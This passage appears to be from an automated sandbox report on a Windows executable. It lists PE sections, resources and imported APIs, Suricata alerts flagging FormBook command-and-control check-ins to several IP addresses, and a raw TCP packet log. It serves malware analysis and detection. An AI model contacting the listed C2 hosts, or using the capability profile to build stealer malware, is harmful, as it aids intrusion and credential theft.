                                                                      .rsrc0xc40000x5da3c0x5dc004ecfde17afb34d2f46673709f383794bFalse0.9294322916666666data7.898861479386194IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .reloc0x1220000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                      RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                      RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                      RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                      RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                      RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                      RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                      RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                      RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                      RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                      RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                      RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                                                      RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                      RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                                                      RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                      RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                      RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                      RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                      RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                      RT_RCDATA0xcc7b80x54d41data1.0003338542611029
                                                                      RT_GROUP_ICON0x1214fc0x76dataEnglishGreat Britain0.6610169491525424
                                                                      RT_GROUP_ICON0x1215740x14dataEnglishGreat Britain1.25
                                                                      RT_GROUP_ICON0x1215880x14dataEnglishGreat Britain1.15
                                                                      RT_GROUP_ICON0x12159c0x14dataEnglishGreat Britain1.25
                                                                      RT_VERSION0x1215b00xdcdataEnglishGreat Britain0.6181818181818182
                                                                      RT_MANIFEST0x12168c0x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                                                                      Imports

                                                                      DLLImport
                                                                      WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                                      VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                      COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                                      MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                      WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                                      PSAPI.DLLGetProcessMemoryInfo
                                                                      IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                      USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                                      UxTheme.dllIsThemeActive
                                                                      KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                                      USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                                      GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                                      COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                      ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                                      SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                      ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                      OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

                                                                      Possible Origin

                                                                      Language of compilation systemCountry where language is spokenMap
                                                                      EnglishGreat Britain

                                                                      Network Behavior

                                                                      Suricata IDS Alerts

                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2025-01-08T16:12:50.222180+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449736188.114.96.380TCP
                                                                      2025-01-08T16:12:50.222180+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449736188.114.96.380TCP
                                                                      2025-01-08T16:13:06.356572+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44973723.167.152.4180TCP
                                                                      2025-01-08T16:13:08.901022+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44973823.167.152.4180TCP
                                                                      2025-01-08T16:13:11.441722+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44973923.167.152.4180TCP
                                                                      2025-01-08T16:13:13.987528+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44974023.167.152.4180TCP
                                                                      2025-01-08T16:13:13.987528+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44974023.167.152.4180TCP
                                                                      2025-01-08T16:13:19.609541+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44974166.29.132.19480TCP
                                                                      2025-01-08T16:13:22.180861+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44974266.29.132.19480TCP
                                                                      2025-01-08T16:13:24.849361+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44974566.29.132.19480TCP
                                                                      2025-01-08T16:13:27.395483+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44976166.29.132.19480TCP
                                                                      2025-01-08T16:13:27.395483+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44976166.29.132.19480TCP
                                                                      2025-01-08T16:13:34.870994+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449803202.92.5.2380TCP
                                                                      2025-01-08T16:13:37.453725+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449820202.92.5.2380TCP
                                                                      2025-01-08T16:13:40.001405+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449838202.92.5.2380TCP
                                                                      2025-01-08T16:13:42.553844+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449854202.92.5.2380TCP
                                                                      2025-01-08T16:13:42.553844+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449854202.92.5.2380TCP
                                                                      2025-01-08T16:13:48.248148+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449895194.195.220.4180TCP
                                                                      2025-01-08T16:13:50.823965+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449911194.195.220.4180TCP
                                                                      2025-01-08T16:13:53.346740+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449927194.195.220.4180TCP
                                                                      2025-01-08T16:13:55.916392+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449946194.195.220.4180TCP
                                                                      2025-01-08T16:13:55.916392+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449946194.195.220.4180TCP
                                                                      2025-01-08T16:14:02.727959+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449981103.230.159.8680TCP
                                                                      2025-01-08T16:14:05.236870+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449999103.230.159.8680TCP
                                                                      2025-01-08T16:14:08.023489+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450016103.230.159.8680TCP
                                                                      2025-01-08T16:14:10.348384+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450022103.230.159.8680TCP
                                                                      2025-01-08T16:14:10.348384+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450022103.230.159.8680TCP
                                                                      2025-01-08T16:14:16.027012+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450023188.114.97.380TCP
                                                                      2025-01-08T16:14:18.611002+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450024188.114.97.380TCP
                                                                      2025-01-08T16:14:21.387697+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450025188.114.97.380TCP
                                                                      2025-01-08T16:14:24.016119+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450026188.114.97.380TCP
                                                                      2025-01-08T16:14:24.016119+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450026188.114.97.380TCP
                                                                      2025-01-08T16:14:30.383853+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450027118.107.250.10380TCP
                                                                      2025-01-08T16:14:32.991448+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450028118.107.250.10380TCP
                                                                      2025-01-08T16:14:35.548903+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450029118.107.250.10380TCP
                                                                      2025-01-08T16:14:38.111978+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450030118.107.250.10380TCP
                                                                      2025-01-08T16:14:38.111978+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450030118.107.250.10380TCP
                                                                      2025-01-08T16:14:43.777584+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450031209.74.77.10980TCP
                                                                      2025-01-08T16:14:46.301778+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450032209.74.77.10980TCP
                                                                      2025-01-08T16:14:48.865463+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450033209.74.77.10980TCP
                                                                      2025-01-08T16:14:51.423596+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450034209.74.77.10980TCP
                                                                      2025-01-08T16:14:51.423596+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450034209.74.77.10980TCP
                                                                      2025-01-08T16:14:57.187963+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450035188.114.96.380TCP
                                                                      2025-01-08T16:14:59.749418+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450036188.114.96.380TCP
                                                                      2025-01-08T16:15:02.354360+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450037188.114.96.380TCP
                                                                      2025-01-08T16:15:04.892532+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450038188.114.96.380TCP
                                                                      2025-01-08T16:15:04.892532+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450038188.114.96.380TCP
                                                                      2025-01-08T16:15:10.618642+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450039194.245.148.18980TCP
                                                                      2025-01-08T16:15:13.142928+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450040194.245.148.18980TCP
                                                                      2025-01-08T16:15:15.775249+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450041194.245.148.18980TCP
                                                                      2025-01-08T16:15:18.236252+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450042194.245.148.18980TCP
                                                                      2025-01-08T16:15:18.236252+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450042194.245.148.18980TCP
                                                                      2025-01-08T16:15:23.845041+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450043199.59.243.22880TCP
                                                                      2025-01-08T16:15:26.403999+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450044199.59.243.22880TCP
                                                                      2025-01-08T16:15:28.949228+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450045199.59.243.22880TCP
                                                                      2025-01-08T16:15:31.561801+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450046199.59.243.22880TCP
                                                                      2025-01-08T16:15:31.561801+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450046199.59.243.22880TCP

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jan 8, 2025 16:12:49.590362072 CET4973680192.168.2.4188.114.96.3
                                                                      Jan 8, 2025 16:12:49.595201969 CET8049736188.114.96.3192.168.2.4
                                                                      Jan 8, 2025 16:12:49.595276117 CET4973680192.168.2.4188.114.96.3
                                                                      Jan 8, 2025 16:12:49.605431080 CET4973680192.168.2.4188.114.96.3
                                                                      Jan 8, 2025 16:12:49.610239029 CET8049736188.114.96.3192.168.2.4
                                                                      Jan 8, 2025 16:12:50.220717907 CET8049736188.114.96.3192.168.2.4
                                                                      Jan 8, 2025 16:12:50.222089052 CET8049736188.114.96.3192.168.2.4
                                                                      Jan 8, 2025 16:12:50.222179890 CET4973680192.168.2.4188.114.96.3
                                                                      Jan 8, 2025 16:12:50.228965998 CET4973680192.168.2.4188.114.96.3
                                                                      Jan 8, 2025 16:12:50.233722925 CET8049736188.114.96.3192.168.2.4
                                                                      Jan 8, 2025 16:13:05.986138105 CET4973780192.168.2.423.167.152.41
                                                                      Jan 8, 2025 16:13:05.990956068 CET804973723.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:05.991044998 CET4973780192.168.2.423.167.152.41
                                                                      Jan 8, 2025 16:13:06.004537106 CET4973780192.168.2.423.167.152.41
                                                                      Jan 8, 2025 16:13:06.009351015 CET804973723.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:06.356487989 CET804973723.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:06.356571913 CET4973780192.168.2.423.167.152.41
                                                                      Jan 8, 2025 16:13:07.511193991 CET4973780192.168.2.423.167.152.41
                                                                      Jan 8, 2025 16:13:07.516113043 CET804973723.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:08.530385971 CET4973880192.168.2.423.167.152.41
                                                                      Jan 8, 2025 16:13:08.535413027 CET804973823.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:08.535522938 CET4973880192.168.2.423.167.152.41
                                                                      Jan 8, 2025 16:13:08.550069094 CET4973880192.168.2.423.167.152.41
                                                                      Jan 8, 2025 16:13:08.554917097 CET804973823.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:08.900876999 CET804973823.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:08.901021957 CET4973880192.168.2.423.167.152.41
                                                                      Jan 8, 2025 16:13:10.058078051 CET4973880192.168.2.423.167.152.41
                                                                      Jan 8, 2025 16:13:10.063003063 CET804973823.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:11.076669931 CET4973980192.168.2.423.167.152.41
                                                                      Jan 8, 2025 16:13:11.081526041 CET804973923.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:11.081639051 CET4973980192.168.2.423.167.152.41
                                                                      Jan 8, 2025 16:13:11.096854925 CET4973980192.168.2.423.167.152.41
                                                                      Jan 8, 2025 16:13:11.101738930 CET804973923.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:11.101749897 CET804973923.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:11.101771116 CET804973923.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:11.101782084 CET804973923.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:11.101793051 CET804973923.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:11.101933002 CET804973923.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:11.101943016 CET804973923.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:11.101996899 CET804973923.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:11.102006912 CET804973923.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:11.441632032 CET804973923.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:11.441721916 CET4973980192.168.2.423.167.152.41
                                                                      Jan 8, 2025 16:13:12.604964018 CET4973980192.168.2.423.167.152.41
                                                                      Jan 8, 2025 16:13:12.610194921 CET804973923.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:13.623488903 CET4974080192.168.2.423.167.152.41
                                                                      Jan 8, 2025 16:13:13.628542900 CET804974023.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:13.628669024 CET4974080192.168.2.423.167.152.41
                                                                      Jan 8, 2025 16:13:13.637958050 CET4974080192.168.2.423.167.152.41
                                                                      Jan 8, 2025 16:13:13.642707109 CET804974023.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:13.987257957 CET804974023.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:13.987528086 CET4974080192.168.2.423.167.152.41
                                                                      Jan 8, 2025 16:13:13.988405943 CET4974080192.168.2.423.167.152.41
                                                                      Jan 8, 2025 16:13:13.993149042 CET804974023.167.152.41192.168.2.4
                                                                      Jan 8, 2025 16:13:19.013520002 CET4974180192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:19.018307924 CET804974166.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:19.018379927 CET4974180192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:19.033127069 CET4974180192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:19.037853956 CET804974166.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:19.609467030 CET804974166.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:19.609481096 CET804974166.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:19.609491110 CET804974166.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:19.609503984 CET804974166.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:19.609514952 CET804974166.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:19.609524965 CET804974166.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:19.609540939 CET4974180192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:19.609581947 CET4974180192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:20.542574883 CET4974180192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:21.560997009 CET4974280192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:21.565926075 CET804974266.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:21.566025019 CET4974280192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:21.579884052 CET4974280192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:21.584623098 CET804974266.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:22.180773020 CET804974266.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:22.180787086 CET804974266.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:22.180795908 CET804974266.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:22.180807114 CET804974266.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:22.180825949 CET804974266.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:22.180835962 CET804974266.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:22.180860996 CET4974280192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:22.180901051 CET4974280192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:23.089318037 CET4974280192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:24.108011961 CET4974580192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:24.112946033 CET804974566.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:24.113034964 CET4974580192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:24.128179073 CET4974580192.168.2.466.29.132.194
                                                                      Jan 8, 2025 16:13:24.133426905 CET804974566.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:24.133440971 CET804974566.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:24.133450031 CET804974566.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:24.133460045 CET804974566.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:24.133471966 CET804974566.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:24.133485079 CET804974566.29.132.194192.168.2.4
                                                                      Jan 8, 2025 16:13:24.133493900 CET804974566.29.132.194192.168.2.4
